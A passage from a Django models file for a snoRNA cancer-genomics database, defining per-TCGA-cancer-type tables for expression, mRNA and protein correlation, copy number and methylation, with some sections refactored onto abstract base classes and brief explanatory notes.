rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
# gene snorna pair
class gene_snorna_pair(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length=225)
def __str__(self):
return self.snorna
# split whole table as cancer type
# for snorna_expression
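Because the expression data is split into one table per TCGA cancer type below, callers must resolve the right model at runtime. A hypothetical helper (`expression_model_name` and `CANCER_TYPES` are not part of this app) assuming the `snorna_expression_<code>` naming convention used below:

```python
# TCGA cancer-type codes with a per-type expression table below
CANCER_TYPES = frozenset([
    "ACC", "BLCA", "BRCA", "CESC", "CHOL", "COAD", "DLBC", "ESCA",
    "HNSC", "KICH", "KIRC", "KIRP", "LGG", "LIHC", "LUAD", "LUSC",
    "MESO", "OV", "PAAD", "PCPG", "PRAD", "READ", "SARC", "SKCM",
    "STAD", "TGCT", "THCA", "THYM", "UCEC",
])


def expression_model_name(cancer_type):
    """Map a TCGA cancer-type code to its snorna_expression_* model name."""
    code = cancer_type.upper()
    if code not in CANCER_TYPES:
        raise ValueError("unknown cancer type: %r" % cancer_type)
    return "snorna_expression_%s" % code
```

The resulting name can then be handed to `django.apps.apps.get_model(app_label, model_name)` to obtain the model class itself.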
class snorna_expression_base(models.Model):
    """Abstract base: shared schema of the per-cancer-type snoRNA expression tables."""
    snorna = models.CharField(max_length=225, null=True)
    dataset_id = models.CharField(max_length=225, null=True)
    sample_id = models.CharField(max_length=225, null=True)
    snorna_expression = models.FloatField(null=True)

    class Meta:
        abstract = True

    def __str__(self):
        return self.snorna


class snorna_expression_ACC(snorna_expression_base):
    pass


class snorna_expression_BLCA(snorna_expression_base):
    pass


class snorna_expression_BRCA(snorna_expression_base):
    pass


class snorna_expression_CESC(snorna_expression_base):
    pass


class snorna_expression_CHOL(snorna_expression_base):
    pass


class snorna_expression_COAD(snorna_expression_base):
    pass


class snorna_expression_DLBC(snorna_expression_base):
    pass


class snorna_expression_ESCA(snorna_expression_base):
    pass


class snorna_expression_HNSC(snorna_expression_base):
    pass


class snorna_expression_KICH(snorna_expression_base):
    pass


class snorna_expression_KIRC(snorna_expression_base):
    pass


class snorna_expression_KIRP(snorna_expression_base):
    pass


class snorna_expression_LGG(snorna_expression_base):
    pass


class snorna_expression_LIHC(snorna_expression_base):
    pass


class snorna_expression_LUAD(snorna_expression_base):
    pass


class snorna_expression_LUSC(snorna_expression_base):
    pass


class snorna_expression_MESO(snorna_expression_base):
    pass


class snorna_expression_OV(snorna_expression_base):
    pass


class snorna_expression_PAAD(snorna_expression_base):
    pass


class snorna_expression_PCPG(snorna_expression_base):
    pass


class snorna_expression_PRAD(snorna_expression_base):
    pass


class snorna_expression_READ(snorna_expression_base):
    pass


class snorna_expression_SARC(snorna_expression_base):
    pass


class snorna_expression_SKCM(snorna_expression_base):
    pass


class snorna_expression_STAD(snorna_expression_base):
    pass


class snorna_expression_TGCT(snorna_expression_base):
    pass


class snorna_expression_THCA(snorna_expression_base):
    pass


class snorna_expression_THYM(snorna_expression_base):
    pass
class snorna_expression_UCEC(models.Model):
snorna = models.CharField(max_length=225, null = True)
dataset_id = models.CharField(max_length=225, null = True)
sample_id = models.CharField(max_length=225, null=True)
snorna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class snorna_expression_UCS(models.Model):
snorna = models.CharField(max_length=225, null = True)
dataset_id = models.CharField(max_length=225, null = True)
sample_id = models.CharField(max_length=225, null=True)
snorna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class snorna_expression_UVM(models.Model):
snorna = models.CharField(max_length=225, null = True)
dataset_id = models.CharField(max_length=225, null = True)
sample_id = models.CharField(max_length=225, null=True)
snorna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
# for mrna expression
# The per-cohort mRNA correlation/expression tables likewise share one schema;
# the common fields live on an abstract base class, and each cohort model
# keeps its own concrete table as before.
class MrnaExpressionBase(models.Model):
    snorna = models.CharField(max_length=225, null=True)
    dataset_id = models.CharField(max_length=225, null=True)
    gene_symbol = models.CharField(max_length=225, null=True)
    host = models.IntegerField(null=True)
    spearman_corr = models.FloatField(null=True)
    p_value = models.FloatField(null=True)
    fdr = models.FloatField(null=True)
    sample_id = models.CharField(max_length=225, null=True)
    rna_expression = models.FloatField(null=True)

    class Meta:
        abstract = True

    def __str__(self):
        return self.snorna


class mrna_expression_ACC(MrnaExpressionBase):
    pass


class mrna_expression_BLCA(MrnaExpressionBase):
    pass


class mrna_expression_BRCA(MrnaExpressionBase):
    pass


class mrna_expression_CESC(MrnaExpressionBase):
    pass


class mrna_expression_CHOL(MrnaExpressionBase):
    pass


class mrna_expression_COAD(MrnaExpressionBase):
    pass


class mrna_expression_DLBC(MrnaExpressionBase):
    pass


class mrna_expression_ESCA(MrnaExpressionBase):
    pass


class mrna_expression_HNSC(MrnaExpressionBase):
    pass


class mrna_expression_KICH(MrnaExpressionBase):
    pass


class mrna_expression_KIRC(MrnaExpressionBase):
    pass


class mrna_expression_KIRP(MrnaExpressionBase):
    pass


class mrna_expression_LGG(MrnaExpressionBase):
    pass


class mrna_expression_LIHC(MrnaExpressionBase):
    pass


class mrna_expression_LUAD(MrnaExpressionBase):
    pass


class mrna_expression_LUSC(MrnaExpressionBase):
    pass


class mrna_expression_MESO(MrnaExpressionBase):
    pass


class mrna_expression_OV(MrnaExpressionBase):
    pass


class mrna_expression_PAAD(MrnaExpressionBase):
    pass


class mrna_expression_PCPG(MrnaExpressionBase):
    pass


class mrna_expression_PRAD(MrnaExpressionBase):
    pass


class mrna_expression_READ(MrnaExpressionBase):
    pass


class mrna_expression_SARC(MrnaExpressionBase):
    pass


class mrna_expression_SKCM(MrnaExpressionBase):
    pass


class mrna_expression_STAD(MrnaExpressionBase):
    pass


class mrna_expression_TGCT(MrnaExpressionBase):
    pass


class mrna_expression_THCA(MrnaExpressionBase):
    pass


class mrna_expression_THYM(MrnaExpressionBase):
    pass


class mrna_expression_UCEC(MrnaExpressionBase):
    pass


class mrna_expression_UCS(MrnaExpressionBase):
    pass


class mrna_expression_UVM(MrnaExpressionBase):
    pass
# for cnv
# The per-cohort copy-number tables share one schema; the common fields live
# on an abstract base class, and each cohort model keeps its own table.
class CnvBase(models.Model):
    snorna = models.CharField(max_length=225, null=True)
    dataset_id = models.CharField(max_length=225, null=True)
    sample_id = models.CharField(max_length=225, null=True)
    copy = models.FloatField(null=True)

    class Meta:
        abstract = True

    def __str__(self):
        return self.snorna


class cnv_ACC(CnvBase):
    pass


class cnv_BLCA(CnvBase):
    pass


class cnv_BRCA(CnvBase):
    pass


class cnv_CESC(CnvBase):
    pass


class cnv_CHOL(CnvBase):
    pass


class cnv_COAD(CnvBase):
    pass


class cnv_DLBC(CnvBase):
    pass


class cnv_ESCA(CnvBase):
    pass


class cnv_HNSC(CnvBase):
    pass


class cnv_KICH(CnvBase):
    pass


class cnv_KIRC(CnvBase):
    pass


class cnv_KIRP(CnvBase):
    pass


class cnv_LGG(CnvBase):
    pass


class cnv_LIHC(CnvBase):
    pass


class cnv_LUAD(CnvBase):
    pass


class cnv_LUSC(CnvBase):
    pass


class cnv_MESO(CnvBase):
    pass


class cnv_OV(CnvBase):
    pass


class cnv_PAAD(CnvBase):
    pass


class cnv_PCPG(CnvBase):
    pass


class cnv_PRAD(CnvBase):
    pass


class cnv_READ(CnvBase):
    pass


class cnv_SARC(CnvBase):
    pass


class cnv_SKCM(CnvBase):
    pass


class cnv_STAD(CnvBase):
    pass


class cnv_TGCT(CnvBase):
    pass


class cnv_THCA(CnvBase):
    pass


class cnv_THYM(CnvBase):
    pass


class cnv_UCEC(CnvBase):
    pass


class cnv_UCS(CnvBase):
    pass


class cnv_UVM(CnvBase):
    pass
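Because the classes above differ only in their cohort suffix, view code would otherwise need a long if/elif chain to pick the right model per TCGA cohort code. A dispatch table keyed by cohort avoids that; here is a minimal stand-alone sketch, with plain placeholder classes standing in for the Django model classes (`cnv_ACC`, `cnv_BRCA`, ...) defined above:

```python
# Placeholder classes standing in for the real Django models above.
class cnv_ACC:
    pass


class cnv_BRCA:
    pass


# Registry mapping TCGA cohort code -> model class, built from the
# module namespace so new cohort classes are picked up automatically.
CNV_MODELS = {
    name.split("_", 1)[1]: cls
    for name, cls in list(globals().items())
    if name.startswith("cnv_")
}


def cnv_model(cohort):
    """Return the CNV model class for a TCGA cohort code, e.g. 'BRCA'."""
    return CNV_MODELS[cohort]
```

In a real Django project, `django.apps.apps.get_model(app_label, f"cnv_{cohort}")` achieves the same lookup without a hand-built registry; the sketch just shows the dispatch idea without requiring a configured Django environment.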
# methylation
# The per-cohort methylation tables share one schema; the common fields live
# on an abstract base class, and each cohort model keeps its own table.
class MethylationBase(models.Model):
    snorna = models.CharField(max_length=225, null=True)
    dataset_id = models.CharField(max_length=225, null=True)
    sample_id = models.CharField(max_length=225, null=True)
    chrom = models.CharField(max_length=10, null=True)
    strand = models.CharField(max_length=4, null=True)
    start = models.IntegerField(null=True)
    end = models.IntegerField(null=True)
    source = models.CharField(max_length=45, null=True)
    distance = models.IntegerField(null=True)
    meth_id = models.CharField(max_length=225, null=True)
    pos = models.IntegerField(null=True)
    level = models.FloatField(null=True)

    class Meta:
        abstract = True

    def __str__(self):
        return self.snorna


class methylation_ACC(MethylationBase):
    pass


class methylation_BLCA(MethylationBase):
    pass


class methylation_BRCA(MethylationBase):
    pass


class methylation_CESC(MethylationBase):
    pass


class methylation_CHOL(MethylationBase):
    pass


class methylation_COAD(MethylationBase):
    pass


class methylation_DLBC(MethylationBase):
    pass


class methylation_ESCA(MethylationBase):
    pass


class methylation_HNSC(MethylationBase):
    pass


class methylation_KICH(MethylationBase):
    pass


class methylation_KIRC(MethylationBase):
    pass
class methylation_KIRP(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_LGG(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_LIHC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_LUAD(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_LUSC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_MESO(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_OV(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_PAAD(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_PCPG(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_PRAD(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_READ(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_SARC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_SKCM(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_STAD(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_TGCT(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_THCA(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_THYM(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_UCEC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_UCS(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_UVM(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
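The `methylation_<CANCER>` classes above repeat the same twelve fields for more than twenty TCGA cancer types. Below is a minimal, framework-free sketch (class and field names mirror the models above, but the helper itself is illustrative and not part of this app) of how such a family of identical classes can be generated from one template; in Django the equivalent idiom is an abstract base model (`class Meta: abstract = True`) whose concrete per-cancer subclasses each keep their own table.

```python
# Illustrative sketch only -- not the app's actual models.
TCGA_CODES = ["ACC", "BLCA", "BRCA", "COAD", "UVM"]  # abbreviated list

class MethylationBase:
    """Stand-in for the shared field definitions of the methylation models."""
    fields = ("snorna", "dataset_id", "sample_id", "chrom", "strand",
              "start", "end", "source", "distance", "meth_id", "pos", "level")

    def __str__(self):
        return self.snorna

# Build one subclass per cancer code, mirroring methylation_ACC, methylation_BLCA, ...
METHYLATION_MODELS = {
    code: type(f"methylation_{code}", (MethylationBase,), {})
    for code in TCGA_CODES
}
```

With real Django models, the concrete subclasses would inherit the abstract base and Django would still create one table per cancer type, leaving the database schema unchanged.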
# protein expression: snoRNA-protein correlations, one table per TCGA cancer type
class protein_expression_ACC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
    protein = models.CharField(max_length=225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_BLCA(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
    protein = models.CharField(max_length=225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_BRCA(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
    protein = models.CharField(max_length=225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_CESC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
    protein = models.CharField(max_length=225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_CHOL(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
    protein = models.CharField(max_length=225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_COAD(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
    protein = models.CharField(max_length=225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_DLBC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
    protein = models.CharField(max_length=225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_ESCA(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
    protein = models.CharField(max_length=225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_HNSC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
    protein = models.CharField(max_length=225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_KICH(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
    protein = models.CharField(max_length=225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_KIRC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
    protein = models.CharField(max_length=225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_KIRP(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
    protein = models.CharField(max_length=225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_LGG(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
    protein = models.CharField(max_length=225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_LIHC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
    protein = models.CharField(max_length=225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_LUAD(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
    protein = models.CharField(max_length=225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_LUSC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
    protein = models.CharField(max_length=225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_MESO(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
    protein = models.CharField(max_length=225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_OV(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
    protein = models.CharField(max_length=225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_PAAD(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
    protein = models.CharField(max_length=225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_PCPG(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
    protein = models.CharField(max_length=225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_PRAD(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
    protein = models.CharField(max_length=225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_READ(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
    protein = models.CharField(max_length=225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_SARC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
    protein = models.CharField(max_length=225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_SKCM(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
    protein = models.CharField(max_length=225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
